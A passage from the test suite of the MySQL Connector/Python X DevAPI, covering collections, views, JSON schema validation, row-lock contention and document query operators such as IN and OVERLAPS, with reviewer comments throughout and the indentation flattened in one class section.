    def test_get_view(self):
        """get_view returns a handle; check_existence=True raises for a
        missing view."""
        table_name = "table_test"
        view_name = "view_test"
        view = self.schema.get_view(view_name)
        self.assertFalse(view.exists_in_database())
        self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
            self.schema_name, table_name)).execute()
        defined_as = "SELECT id FROM {0}.{1}".format(self.schema_name,
                                                     table_name)
        view = create_view(self.schema, view_name, defined_as)
        self.assertTrue(view.exists_in_database())
        # raise a ProgrammingError if the view does not exists
        self.assertRaises(mysqlx.ProgrammingError,
                          self.schema.get_view, "nonexistent",
                          check_existence=True)
        drop_table(self.schema, table_name)
        drop_view(self.schema, view_name)

    def test_get_collections(self):
        """get_collections lists all collections of the schema, in order."""
        coll = self.schema.get_collections()
        self.assertEqual(0, len(coll), "Should have returned 0 objects")
        self.schema.create_collection("coll1")
        self.schema.create_collection("coll2")
        self.schema.create_collection("coll3")
        coll = self.schema.get_collections()
        self.assertEqual(3, len(coll), "Should have returned 3 objects")
        self.assertEqual("coll1", coll[0].get_name())
        self.assertEqual("coll2", coll[1].get_name())
        self.assertEqual("coll3", coll[2].get_name())
        self.schema.drop_collection("coll1")
        self.schema.drop_collection("coll2")
        self.schema.drop_collection("coll3")

    def test_get_tables(self):
        """get_tables lists both base tables and views."""
        tables = self.schema.get_tables()
        self.assertEqual(0, len(tables), "Should have returned 0 objects")
        self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
            self.schema_name, "table1")).execute()
        self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
            self.schema_name, "table2")).execute()
        self.session.sql(_CREATE_TEST_TABLE_QUERY.format(
            self.schema_name, "table3")).execute()
        self.session.sql(_CREATE_TEST_VIEW_QUERY.format(
            self.schema_name, "view1",
            self.schema_name, "table1")).execute()
        tables = self.schema.get_tables()
        self.assertEqual(4, len(tables), "Should have returned 4 objects")
        self.assertEqual("table1", tables[0].get_name())
        self.assertEqual("table2", tables[1].get_name())
        self.assertEqual("table3", tables[2].get_name())
        self.assertEqual("view1", tables[3].get_name())
        drop_table(self.schema, "table1")
        drop_table(self.schema, "table2")
        drop_table(self.schema, "table3")
        drop_view(self.schema, "view1")

    def test_drop_collection(self):
        """drop_collection removes the collection and is idempotent."""
        collection_name = "collection_test"
        collection = self.schema.create_collection(collection_name)
        self.schema.drop_collection(collection_name)
        self.assertFalse(collection.exists_in_database())
        # dropping an non-existing collection should succeed silently
        self.schema.drop_collection(collection_name)

    @unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 19),
                     "Schema validation unavailable.")
    def test_schema_validation(self):
        """Exercise JSON schema validation options on create/modify,
        including invalid option combinations and enforcement at insert."""
        collection_name = "collection_test"
        json_schema = {
            "id": "http://json-schema.org/geo",
            "$schema": "http://json-schema.org/draft-07/schema#",
            "title": "Longitude and Latitude Values",
            "description": "A geographical coordinate",
            "required": ["latitude", "longitude"],
            "type": "object",
            "properties": {
                "latitude": {
                    "type": "number",
                    "minimum": -90,
                    "maximum": 90
                },
                "longitude": {
                    "type": "number",
                    "minimum": -180,
                    "maximum": 180
                }
            },
        }
        json_schema_string = json.dumps(json_schema)
        # Invalid validation options cases
        invalid_options = [
            "",
            -1,
            {},
            {"foo": "bar"},
            {"level": None, "schema": None},
            {"level": "off", "schema": True},
            {"level": "off", "schema": None},
            {"level": "on", "schema": json_schema},
            {"level": True, "schema": json_schema},
        ]
        # Test Schema.create_schema() validation options
        for validation in invalid_options:
            self.assertRaises(mysqlx.ProgrammingError,
                              self.schema.create_collection,
                              collection_name,
                              validation=validation)
        # Invalid option in validation
        self.assertRaises(mysqlx.ProgrammingError,
                          self.schema.create_collection,
                          collection_name,
                          validation={"level": "strict",
                                      "schema": json_schema,
                                      "invalid": "option"})
        # Test using JSON schema as dict
        coll = self.schema.create_collection(
            collection_name, validation={"level": "strict",
                                         "schema": json_schema})
        # The latitude and longitude should be numbers
        self.assertRaises(mysqlx.OperationalError,
                          coll.add({"latitude": "41.14961",
                                    "longitude": "-8.61099"}).execute)
        coll.add({"latitude": 41.14961, "longitude": -8.61099}).execute()
        self.assertEqual(1, coll.count())
        self.schema.drop_collection(collection_name)
        # Test JSON schema as string
        coll = self.schema.create_collection(
            collection_name, validation={"level": "strict",
                                         "schema": json_schema_string})
        self.assertRaises(mysqlx.OperationalError,
                          coll.add({"latitude": "41.14961",
                                    "longitude": "-8.61099"}).execute)
        coll.add({"latitude": 41.14961, "longitude": -8.61099}).execute()
        self.assertEqual(1, coll.count())
        # Test Schema.modify_collection() validation options
        for validation in invalid_options:
            self.assertRaises(mysqlx.ProgrammingError,
                              self.schema.modify_collection,
                              collection_name,
                              validation=validation)
        # Test Schema.modify_collection()
        coll.modify("TRUE").set("location", "Porto/Portugal").execute()
        json_schema["properties"]["location"] = {"type": "string"}
        json_schema["required"].append("location")
        self.schema.modify_collection(
            collection_name, validation={"level": "strict",
                                         "schema": json_schema})
        # The 'location' property is required
        self.assertRaises(mysqlx.OperationalError,
                          coll.add({"latitude": 41.14961,
                                    "longitude": -8.61099}).execute)
        coll.add({"location": "Porto/Portugal",
                  "latitude": 41.14961,
                  "longitude": -8.61099}).execute()
        self.assertEqual(2, coll.count())
        # Test using only 'level' option in Schema.modify_collection()
        self.schema.modify_collection(
            collection_name, validation={"level": "off"})
        # Test using only 'schema' option in Schema.modify_collection()
        self.schema.modify_collection(
            collection_name, validation={"schema": json_schema})
        # Test validation without any information in Schema.modify_collection()
        # NOTE(review): this call duplicates the 'schema'-only call above;
        # the comment suggests an empty validation dict was intended — confirm.
        self.schema.modify_collection(
            collection_name, validation={"schema": json_schema})
        # Drop the collection
        self.schema.drop_collection(collection_name)

    @unittest.skipIf(tests.MYSQL_VERSION >= (8, 0, 19),
                     "Schema validation is available.")
    def test_unsupported_schema_validation(self):
        """On servers older than 8.0.19 validation options must raise
        NotSupportedError while schema-less collections keep working."""
        collection_name = "collection_test"
        json_schema = {
            "id": "http://json-schema.org/geo",
            "$schema": "http://json-schema.org/draft-07/schema#",
            "title": "Longitude and Latitude Values",
            "description": "A geographical coordinate",
            "required": ["latitude", "longitude"],
            "type": "object",
            "properties": {
                "latitude": {
                    "type": "number",
                    "minimum": -90,
                    "maximum": 90
                },
                "longitude": {
                    "type": "number",
                    "minimum": -180,
                    "maximum": 180
                }
            },
        }
        # Test creating a schema-less collection on server < 8.0.19
        coll = self.schema.create_collection(collection_name)
        self.schema.drop_collection(collection_name)
        # Test creating a collection with validation on server < 8.0.19
        self.assertRaises(mysqlx.NotSupportedError,
                          self.schema.create_collection,
                          collection_name,
                          validation={"level": "strict",
                                      "schema": json_schema})
        # Test modifying a collection with validation on server < 8.0.19
        self.assertRaises(mysqlx.NotSupportedError,
                          self.schema.modify_collection,
                          collection_name,
                          validation={"level": "strict",
                                      "schema": json_schema})
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 14), "XPlugin not compatible")
class MySQLxCollectionTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.schema_name = self.connect_kwargs["schema"]
try:
self.session = mysqlx.get_session(self.connect_kwargs)
except mysqlx.Error as err:
self.fail("{0}".format(err))
self.schema = self.session.get_schema(self.schema_name)
def tearDown(self):
self.session.close()
def test_exists_in_database(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
self.assertTrue(collection.exists_in_database())
self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 3), "Row locks unavailable.")
def test_lock_shared(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add({"_id": "1", "name": "Fred", "age": 21}).execute()
waiting = threading.Event()
lock_a = threading.Lock()
lock_b = threading.Lock()
errors = []
def client_a(lock_a, lock_b, waiting):
sess1 = mysqlx.get_session(self.connect_kwargs)
schema = sess1.get_schema(self.schema_name)
collection = schema.get_collection(collection_name)
sess1.start_transaction()
result = collection.find("name = 'Fred'").lock_shared().execute()
lock_a.release()
lock_b.acquire()
time.sleep(2)
if waiting.is_set():
errors.append("S-S lock test failure.")
sess1.commit()
return
sess1.commit()
sess1.start_transaction()
result = collection.find("name = 'Fred'").lock_shared().execute()
lock_b.release()
lock_a.acquire()
time.sleep(2)
if not waiting.is_set():
errors.append("S-X lock test failure.")
sess1.commit()
return
sess1.commit()
def client_b(lock_a, lock_b, waiting):
sess1 = mysqlx.get_session(self.connect_kwargs)
schema = sess1.get_schema(self.schema_name)
collection = schema.get_collection(collection_name)
lock_a.acquire()
sess1.start_transaction()
waiting.set()
lock_b.release()
result = collection.find("name = 'Fred'").lock_shared().execute()
waiting.clear()
sess1.commit()
lock_b.acquire()
sess1.start_transaction()
waiting.set()
lock_a.release()
result = collection.find("name = 'Fred'").lock_exclusive().execute()
waiting.clear()
sess1.commit()
client1 = threading.Thread(target=client_a,
args=(lock_a, lock_b, waiting,))
client2 = threading.Thread(target=client_b,
args=(lock_a, lock_b, waiting,))
lock_a.acquire()
lock_b.acquire()
client1.start()
client2.start()
client1.join()
client2.join()
self.schema.drop_collection(collection_name)
if errors:
self.fail(errors[0])
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 3), "Row locks unavailable.")
def test_lock_exclusive(self):
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
collection.add({"_id": "1", "name": "Fred", "age": 21}).execute()
event = threading.Event()
pause = threading.Event()
locking = threading.Event()
waiting = threading.Event()
errors = []
def client_a(pause, locking, waiting):
sess1 = mysqlx.get_session(self.connect_kwargs)
schema = sess1.get_schema(self.schema_name)
collection = schema.get_collection(collection_name)
sess1.start_transaction()
result = collection.find("name = 'Fred'").lock_exclusive().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
sess1.commit()
errors.append("X-X lock test failure.")
return
sess1.commit()
pause.set()
sess1.start_transaction()
result = collection.find("name = 'Fred'").lock_exclusive().execute()
locking.set()
time.sleep(2)
locking.clear()
if not waiting.is_set():
errors.append("X-S lock test failure.")
sess1.commit()
return
sess1.commit()
def client_b(pause, locking, waiting):
sess1 = mysqlx.get_session(self.connect_kwargs)
schema = sess1.get_schema(self.schema_name)
collection = schema.get_collection(collection_name)
if not locking.wait(2):
return
sess1.start_transaction()
waiting.set()
result = collection.find("name = 'Fred'").lock_exclusive().execute()
waiting.clear()
sess1.commit()
if not pause.wait(2):
return
if not locking.wait(2):
return
sess1.start_transaction()
waiting.set()
result = collection.find("name = 'Fred'").lock_shared().execute()
waiting.clear()
sess1.commit()
client1 = threading.Thread(target=client_a,
args=(pause, locking, waiting,))
client2 = threading.Thread(target=client_b,
args=(pause, locking, waiting,))
client1.start()
client2.start()
client1.join()
client2.join()
self.schema.drop_collection(collection_name)
if errors:
self.fail(errors[0])
@unittest.skipIf(tests.MYSQL_VERSION > (8, 0, 4),
"id field creation on server must not be available.")
def test_add_old_versions(self):
"""Tests error message when adding documents without an ids on old
servers"""
collection_name = "collection_test"
collection = self.schema.create_collection(collection_name)
coll_add = collection.add({"name": "Fred", "age": 21})
self.assertRaises(mysqlx.errors.OperationalError, coll_add.execute)
# Providing _id for each document must allow his insertion
persons = [{"_id": "12345678901234567890123456789012",
"name": "Dyno dog dinosaur", "age": 33},
{"_id": "12345678901234567890123456789013",
"name": "Puss saber-toothed cat", "age": 42}]
result = collection.add(persons).execute()
self.assertEqual(2, result.get_affected_items_count(),
"documents not inserted")
# Empty list is expected here since the server did not generate the ids
self.assertEqual([], result.get_generated_ids(),
"_id from user was overwritten")
self.schema.drop_collection(collection_name)
def _test_lock_contention(self, lock_type_1, lock_type_2, lock_contention):
    """Exercise document lock contention between two sessions.

    thread_a takes a shared ("S") or exclusive ("X") lock per
    ``lock_type_1`` and holds it for ~2s; thread_b then requests a
    ``lock_type_2`` lock using the given ``lock_contention`` policy
    (NOWAIT / SKIP_LOCKED).  The ``locking``/``waiting`` events
    coordinate the two threads; failures are collected in ``errors``
    and reported after both threads join.
    """
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    collection.add({"name": "Fred", "age": 21}).execute()
    locking = threading.Event()
    waiting = threading.Event()
    errors = []
    def thread_a(locking, waiting):
        # First session: acquires the initial lock and expects thread_b
        # to have signalled "waiting" within the 2-second hold window.
        session = mysqlx.get_session(self.connect_kwargs)
        schema = session.get_schema(self.schema_name)
        collection = schema.get_collection(collection_name)
        session.start_transaction()
        result = collection.find("name = 'Fred'")
        if lock_type_1 == "S":
            result.lock_shared().execute()
        else:
            result.lock_exclusive().execute()
        locking.set()
        time.sleep(2)
        locking.clear()
        if not waiting.is_set():
            # BUGFIX: the message formatted lock_type_1 twice ("{0}-{0}")
            # and silently dropped lock_type_2.
            errors.append("{0}-{1} lock test failure."
                          "".format(lock_type_1, lock_type_2))
            session.commit()
            return
        session.commit()
    def thread_b(locking, waiting):
        # Second session: requests the competing lock with the given
        # contention policy once thread_a signals it holds its lock.
        session = mysqlx.get_session(self.connect_kwargs)
        schema = session.get_schema(self.schema_name)
        collection = schema.get_collection(collection_name)
        if not locking.wait(2):
            errors.append("{0}-{1} lock test failure."
                          "".format(lock_type_1, lock_type_2))
            session.commit()
            return
        session.start_transaction()
        if lock_type_2 == "S":
            result = collection.find("name = 'Fred'") \
                .lock_shared(lock_contention)
        else:
            result = collection.find("name = 'Fred'") \
                .lock_exclusive(lock_contention)
        if lock_contention == mysqlx.LockContention.NOWAIT \
                and (lock_type_1 == "X" or lock_type_2 == "X"):
            # With NOWAIT and an exclusive lock in play the request
            # must fail immediately instead of blocking.
            self.assertRaises(mysqlx.OperationalError, result.execute)
            session.rollback()
        waiting.set()
        time.sleep(4)
        # By now thread_a has committed, so the lock can be acquired.
        session.start_transaction()
        result.execute()
        session.commit()
        waiting.clear()
    client1 = threading.Thread(target=thread_a, args=(locking, waiting,))
    client2 = threading.Thread(target=thread_b, args=(locking, waiting,))
    client1.start()
    client2.start()
    client1.join()
    client2.join()
    self.schema.drop_collection(collection_name)
    # BUGFIX: errors were collected but never checked, so thread
    # failures could not fail the test (the sibling X-S lock test does
    # report them this way).
    if errors:
        self.fail(errors[0])
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
                 "Lock contention unavailable.")
def test_lock_shared_with_nowait(self):
    """Shared first lock vs. both lock types with the NOWAIT policy."""
    for second_lock in ("S", "X"):
        self._test_lock_contention("S", second_lock,
                                   mysqlx.LockContention.NOWAIT)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
                 "Lock contention unavailable.")
def test_lock_exclusive_with_nowait(self):
    """Exclusive first lock vs. both lock types with the NOWAIT policy."""
    for second_lock in ("X", "S"):
        self._test_lock_contention("X", second_lock,
                                   mysqlx.LockContention.NOWAIT)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
                 "Lock contention unavailable.")
def test_lock_shared_with_skip_locked(self):
    """Shared first lock vs. both lock types with SKIP_LOCKED."""
    for second_lock in ("S", "X"):
        self._test_lock_contention("S", second_lock,
                                   mysqlx.LockContention.SKIP_LOCKED)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
                 "Lock contention unavailable.")
def test_lock_exclusive_with_skip_locker(self):
    """Exclusive first lock vs. both lock types with SKIP_LOCKED.

    NOTE(review): method name has a typo ("locker" for "locked"); kept
    as-is to avoid changing test discovery.
    """
    for second_lock in ("X", "S"):
        self._test_lock_contention("X", second_lock,
                                   mysqlx.LockContention.SKIP_LOCKED)
def test_add(self):
    """CollectionAdd: dicts, multiple docs, JSON strings, unicode, and
    server-side ``_id`` generation (servers newer than 8.0.4)."""
    collection_name = "collection_test"
    collection = self.schema.create_collection(collection_name)
    # Single dictionary document.
    result = collection.add(
        {"_id": 1, "name": "Fred", "age": 21}
    ).execute()
    self.assertEqual(result.get_affected_items_count(), 1)
    self.assertEqual(1, collection.count())
    # Adding multiple dictionaries at once
    result = collection.add(
        {"_id": 2, "name": "Wilma", "age": 33},
        {"_id": 3, "name": "Barney", "age": 42}
    ).execute()
    self.assertEqual(result.get_affected_items_count(), 2)
    self.assertEqual(3, collection.count())
    # Adding JSON strings
    result = collection.add(
        '{"_id": 4, "name": "Bambam", "age": 8}',
        '{"_id": 5, "name": "Pebbles", "age": 8}'
    ).execute()
    self.assertEqual(result.get_affected_items_count(), 2)
    self.assertEqual(5, collection.count())
    # All strings should be considered literal, for expressions
    # mysqlx.expr() function must be used
    collection.add(
        {"_id": "6", "status": "Approved",
         "email": "Fred (fred@example.com)"},
        {"_id": "7", "status": "Rejected\n(ORA:Pending)",
         "email": "Barney (barney@example.com)"},
    ).execute()
    result = collection.find().execute()
    self.assertEqual(7, len(result.fetch_all()))
    # test unicode
    result = collection.add({"_id": "8", "age": 1, "name": u"😀"}).execute()
    self.assertEqual(result.get_affected_items_count(), 1)
    self.assertEqual(8, collection.count())
    if tests.MYSQL_VERSION > (8, 0, 4):
        # Following test are only possible on servers with id generation.
        # Ensure _id is created at the server side
        persons = [{"name": "Wilma", "age": 33},
                   {"name": "Barney", "age": 42}]
        result = collection.add(persons).execute()
        for person in persons:
            # Ensure no '_id' field was added locally (the caller's
            # dicts must not be mutated by add()).
            if tests.PY2:
                self.assertFalse(person.has_key("_id"))
            else:
                self.assertFalse("_id" in person)
        self.assertEqual(2, result.get_affected_items_count(),
                         "Not all documents were inserted")
        # Allow _id given from the user and server side generation
        persons = [{"_id": "12345678901234567890123456789012",
                    "name": "Dyno", "desc": "dog dinosaur"},
                   {"_id": "12345678901234567890123456789013",
                    "name": "Puss", "desc": "saber-toothed cat"},
                   # following doc does not have id field and must be
                   # generated at the server side
                   {"name": "hoppy", "desc": "hoppy kangaroo/dinosaur"}]
        result = collection.add(persons).execute()
        self.assertEqual(3, result.get_affected_items_count(),
                         "Not all documents were inserted")
        # Only 1 `_id` was generated, 2 were given by us.
        self.assertEqual(1, len(result.get_generated_ids()),
                         "Unexpected number of _id were generated.")
        result = collection.find().execute()
        for row in result.fetch_all():
            self.assertTrue(hasattr(row, "_id"),
                            "`_id` field could not be found in doc")
    self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 2),
                 "CONT_IN operator unavailable")
def test_cont_in_operator(self):
    """CONT_IN (IN / NOT IN) operator over a movie document.

    Each test case pairs an expression with its expected value; an
    expected value of ``None`` means evaluating the expression must
    raise.  Expected values vary with the server version because of
    the SQL-standard NULL-handling change in 8.0.17.
    """
    collection_name = "{0}.test".format(self.schema_name)
    collection = self.schema.create_collection(collection_name)
    collection.add({
        "_id": "a6f4b93e1a264a108393524f29546a8c",
        "title": "AFRICAN EGG",
        "description": "A Fast-Paced Documentary of a Pastry Chef And a "
                       "Dentist who must Pursue a Forensic Psychologist in "
                       "The Gulf of Mexico",
        "releaseyear": 2006,
        "language": "English",
        "duration": 130,
        "rating": "G",
        "genre": "Science fiction",
        "actors": [{
            "name": "MILLA PECK",
            "country": "Mexico",
            "birthdate": "12 Jan 1984"
        }, {
            "name": "VAL BOLGER",
            "country": "Botswana",
            "birthdate": "26 Jul 1975"
        }, {
            "name": "SCARLETT BENING",
            "country": "Syria",
            "birthdate": "16 Mar 1978"
        }],
        "additionalinfo": {
            "director": "Sharice Legaspi",
            "writers": ["Rusty Couturier", "Angelic Orduno", "Carin Postell"],
            "productioncompanies": ["Qvodrill", "Indigoholdings"]
        }
    }).execute()
    if tests.MYSQL_VERSION >= (8, 0, 17):
        # To comply with the SQL standard, IN returns NULL not only if the
        # expression on the left hand side is NULL, but also if no match
        # is found in the list and one of the expressions in the list is NULL.
        not_found_without_null = False
        not_found_with_null = None
        # Value false match result changed
        value_false_match_everything = False
    else:
        not_found_without_null = None
        not_found_with_null = True
        value_false_match_everything = True
    test_cases = [
        ("(1+5) in (1, 2, 3, 4, 5)", False),
        ("(1>5) in (true, false)", True),
        ("('a'>'b') in (true, false)", True),
        ("(1>5) in [true, false]", None),
        ("(1+5) in [1, 2, 3, 4, 5]", None),
        ("('a'>'b') in [true, false]", None),
        ("true IN [(1>5), !(false), (true || false), (false && true)]",
         True),
        ("true IN ((1>5), !(false), (true || false), (false && true))",
         True),
        ("{ 'name' : 'MILLA PECK' } IN actors", True),
        ("{\"field\":true} IN (\"mystring\", 124, myvar, othervar.jsonobj)",
         not_found_without_null),
        ("actor.name IN ['a name', null, (1<5-4), myvar.jsonobj.name]",
         None),
        ("!false && true IN [true]", True),
        ("1-5/2*2 > 3-2/1*2 IN [true, false]", None),
        ("true IN [1-5/2*2 > 3-2/1*2]", False),
        ("'African Egg' IN ('African Egg', 1, true, NULL, [0,1,2], "
         "{ 'title' : 'Atomic Firefighter' })", True),
        ("1 IN ('African Egg', 1, true, NULL, [0,1,2], "
         "{ 'title' : 'Atomic Firefighter' })", True),
        ("true IN ('African Egg', 1, false, NULL, [0,1,2], "
         "{ 'title' : 'Atomic Firefighter' })", not_found_with_null),
        ("false IN ('African Egg', 1, true, NULL, [0,1,2], "
         "{ 'title' : 'Atomic Firefighter' })", not_found_with_null),
        ("false IN ('African Egg', 1, true, 'No null', [0,1,2], "
         "{ 'title' : 'Atomic Firefighter' })", value_false_match_everything),
        ("[0,1,2] IN ('African Egg', 1, true, NULL, [0,1,2], "
         "{ 'title' : 'Atomic Firefighter' })", True),
        ("{ 'title' : 'Atomic Firefighter' } IN ('African Egg', 1, true, "
         "NULL, [0,1,2], { 'title' : 'Atomic Firefighter' })", True),
        ("title IN ('African Egg', 'The Witcher', 'Jurassic Perk')", False),
        ("releaseyear IN (2006, 2010, 2017)", True),
        ("'African Egg' in movietitle", None),
        ("0 NOT IN [1,2,3]", True),
        ("1 NOT IN [1,2,3]", False),
        ("'' IN title", False),
        ("title IN ('', ' ')", False),
        ("title IN ['', ' ']", False),
        ("[\"Rusty Couturier\", \"Angelic Orduno\", \"Carin Postell\"] IN "
         "additionalinfo.writers", True),
        ("{ \"name\" : \"MILLA PECK\", \"country\" : \"Mexico\", "
         "\"birthdate\": \"12 Jan 1984\"} IN actors", True),
        ("releaseyear IN [2006, 2007, 2008]", True),
        ("true IN title", False),
        ("false IN genre", False),
        ("'Sharice Legaspi' IN additionalinfo.director", True),
        ("'Mexico' IN actors[*].country", True),
        ("'Angelic Orduno' IN additionalinfo.writers", True),
    ]
    for test in test_cases:
        try:
            result = collection.find() \
                .fields("{0} as res".format(test[0])) \
                .execute().fetch_one()
        except Exception:
            # BUGFIX: was a bare "except:", which would also swallow
            # KeyboardInterrupt/SystemExit.
            self.assertEqual(None, test[1])
        else:
            self.assertEqual(result['res'], test[1], "For test case {} "
                             "result was {}".format(test, result))
    self.schema.drop_collection(collection_name)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 17),
                 "OVERLAPS operator unavailable")
def test_overlaps_operator(self):
    """OVERLAPS / NOT OVERLAPS operator over a movie document.

    Each test case pairs an expression with its expected value; an
    expected value of ``None`` means evaluating the expression must
    raise (e.g. OVERLAPS with non-array operands).
    """
    collection_name = "{0}.test".format(self.schema_name)
    collection = self.schema.create_collection(collection_name)
    collection.add({
        "_id": "a6f4b93e1a264a108393524f29546a8c",
        "title": "AFRICAN EGG",
        "description": "A Fast-Paced Documentary of a Pastry Chef And a "
                       "Dentist who must Pursue a Forensic Psychologist in "
                       "The Gulf of Mexico",
        "releaseyear": 2006,
        "language": "English",
        "duration": 130,
        "rating": "G",
        "genre": "Science fiction",
        "actors": [{
            "name": "MILLA PECK",
            "country": "Mexico",
            "birthdate": "12 Jan 1984"
        }, {
            "name": "VAL BOLGER",
            "country": "Botswana",
            "birthdate": "26 Jul 1975"
        }, {
            "name": "SCARLETT BENING",
            "country": "Syria",
            "birthdate": "16 Mar 1978"
        }],
        "additionalinfo": {
            "director": "Sharice Legaspi",
            "writers": ["Rusty Couturier", "Angelic Orduno", "Carin Postell"],
            "productioncompanies": ["Qvodrill", "Indigoholdings"]
        }
    }).execute()
    test_cases = [
        ("(1+5) overlaps (1, 2, 3, 4, 5)", None),
        ("(1>5) overlaps (true, false)", None),
        ("('a'>'b') overlaps (true, false)", None),
        ("(1>5) overlaps [true, false]", None),
        ("[1>5] overlaps [true, false]", True),
        ("[(1+5)] overlaps [1, 2, 3, 4, 5]", False),
        ("[(1+4)] overlaps [1, 2, 3, 4, 5]", True),
        ("('a'>'b') overlaps [true, false]", None),
        ("true overlaps [(1>5), !(false), (true || false), (false && true)]",
         True),
        ("true overlaps ((1>5), !(false), (true || false), (false && true))",
         None),
        ("{ 'name' : 'MILLA PECK' } overlaps actors", False),
        ("{\"field\":true} overlaps (\"mystring\", 124, myvar, othervar.jsonobj)",
         None),
        ("actor.name overlaps ['a name', null, (1<5-4), myvar.jsonobj.name]",
         None),
        ("!false && true overlaps [true]", True),
        ("1-5/2*2 > 3-2/1*2 overlaps [true, false]", None),
        ("true IN [1-5/2*2 > 3-2/1*2]", False),
        ("'African Egg' overlaps ('African Egg', 1, true, NULL, [0,1,2], "
         "{ 'title' : 'Atomic Firefighter' })", None),
        ("1 overlaps ('African Egg', 1, true, NULL, [0,1,2], "
         "{ 'title' : 'Atomic Firefighter' })", None),
        ("true overlaps ('African Egg', 1, false, NULL, [0,1,2], "
         "{ 'title' : 'Atomic Firefighter' })", None),
        ("false overlaps ('African Egg', 1, true, NULL, [0,1,2], "
         "{ 'title' : 'Atomic Firefighter' })", None),
        ("false overlaps ('African Egg', 1, true, 'No null', [0,1,2], "
         "{ 'title' : 'Atomic Firefighter' })", None),
        ("[0,1,2] overlaps ('African Egg', 1, true, NULL, [0,1,2], "
         "{ 'title' : 'Atomic Firefighter' })", None),
        ("{ 'title' : 'Atomic Firefighter' } overlaps ('African Egg', 1, true, "
         "NULL, [0,1,2], { 'title' : 'Atomic Firefighter' })", None),
        ("title overlaps ('African Egg', 'The Witcher', 'Jurassic Perk')", None),
        ("releaseyear overlaps (2006, 2010, 2017)", None),
        ("'African overlaps' in movietitle", None),
        ("0 NOT overlaps [1,2,3]", True),
        ("1 NOT overlaps [1,2,3]", False),
        ("[0] NOT overlaps [1,2,3]", True),
        ("[1] NOT overlaps [1,2,3]", False),
        ("[!false && true] OVERLAPS [true]", True),
        ("[!false AND true] OVERLAPS [true]", True),
        ("[!false & true] OVERLAPS [true]", False),
        ("'' IN title", False),
        ("title overlaps ('', ' ')", None),
        ("title overlaps ['', ' ']", False),
        ("[\"Rusty Couturier\", \"Angelic Orduno\", \"Carin Postell\"] IN "
         "additionalinfo.writers", True),
        ("{ \"name\" : \"MILLA PECK\", \"country\" : \"Mexico\", "
         "\"birthdate\": \"12 Jan 1984\"} IN actors", True),
        ("releaseyear IN [2006, 2007, 2008]", True),
        ("true overlaps title", False),
        ("false overlaps genre", False),
        ("'Sharice Legaspi' overlaps additionalinfo.director", True),
        ("'Mexico' overlaps actors[*].country", True),
        ("'Angelic Orduno' overlaps additionalinfo.writers", True),
        ("[([1,2] overlaps [1,2])] overlaps [false] invalid [true]", None),
        ("[([1] overlaps [2])] overlaps [3] invalid [true] as res", None),
        ("[] []", None),
        ("[] TRUE as res", None)
    ]
    for test in test_cases:
        try:
            result = collection.find() \
                .fields("{0} as res".format(test[0])) \
                .execute().fetch_one()
        except Exception:
            # BUGFIX: was a bare "except:", which would also swallow
            # KeyboardInterrupt/SystemExit.  Also fixed the message
            # typo "exeption" below.
            self.assertEqual(None, test[1], "For test case {} "
                             "exception was not expected.".format(test))
        else:
            self.assertEqual(result['res'], test[1], "For test case {} "
                             "result was {}".format(test, result))
    self.schema.drop_collection(collection_name)
def test_ilri_expressions(self):
    """IS [NOT] NULL, [NOT] REGEXP/LIKE/IN/BETWEEN in find conditions.

    Each condition is paired with the number of matching documents out
    of the four inserted below.
    """
    collection_name = "{0}.test".format(self.schema_name)
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    ).execute()
    cases = [
        ("$.key is null", 4),
        ("$.key is not null", 0),
        ("$.name regexp 'F.*'", 1),
        ("$.name not regexp 'F.*'", 3),
        ("$.name like 'F%'", 1),
        ("$.name not like 'F%'", 3),
        ("$.age in (21, 28)", 2),
        ("$.age not in (21, 28)", 2),
        ("$.age between 20 and 29", 2),
        ("$.age not between 20 and 29", 2),
    ]
    for condition, expected_count in cases:
        docs = collection.find(condition).execute().fetch_all()
        self.assertEqual(expected_count, len(docs))
    self.schema.drop_collection(collection_name)
def test_unary_operators(self):
    """Unary +, -, ! / not, and bitwise ~ inside field projections."""
    collection_name = "{0}.test".format(self.schema_name)
    collection = self.schema.create_collection(collection_name)
    collection.add(
        {"_id": "1", "name": "Fred", "age": 21},
        {"_id": "2", "name": "Barney", "age": 28},
        {"_id": "3", "name": "Wilma", "age": 42},
        {"_id": "4", "name": "Betty", "age": 67},
    ).execute()

    def projected(expression):
        # Evaluate the projection against Fred's document (age 21) and
        # return the value of the aliased "test" field.
        res = collection.find("$.age == 21").fields(expression).execute()
        return res.fetch_all()[0]["test"]

    # Unary plus keeps the sign produced by the multiplication.
    self.assertEqual(-21, projected("+($.age * -1) as test"))
    # Unary minus negates the value.
    self.assertEqual(-21, projected("-$.age as test"))
    # Logical negation, both the "!" and "not" spellings.
    self.assertFalse(projected("! ($.age == 21) as test"))
    self.assertFalse(projected("not ($.age == 21) as test"))
    # Bitwise complement: 5 & ~1 == 4.
    self.assertEqual(4, projected("5 & ~1 as test"))
    self.schema.drop_collection(collection_name)
def test_interval_expressions(self):
    """INTERVAL arithmetic on date/datetime document fields.

    Every projection compares an INTERVAL computation against the
    expected literal, so each aliased "test" field must be true.
    """
    collection_name = "{0}.test".format(self.schema_name)
    collection = self.schema.create_collection(collection_name)
    collection.add({"_id": "1", "adate": "2000-01-01",
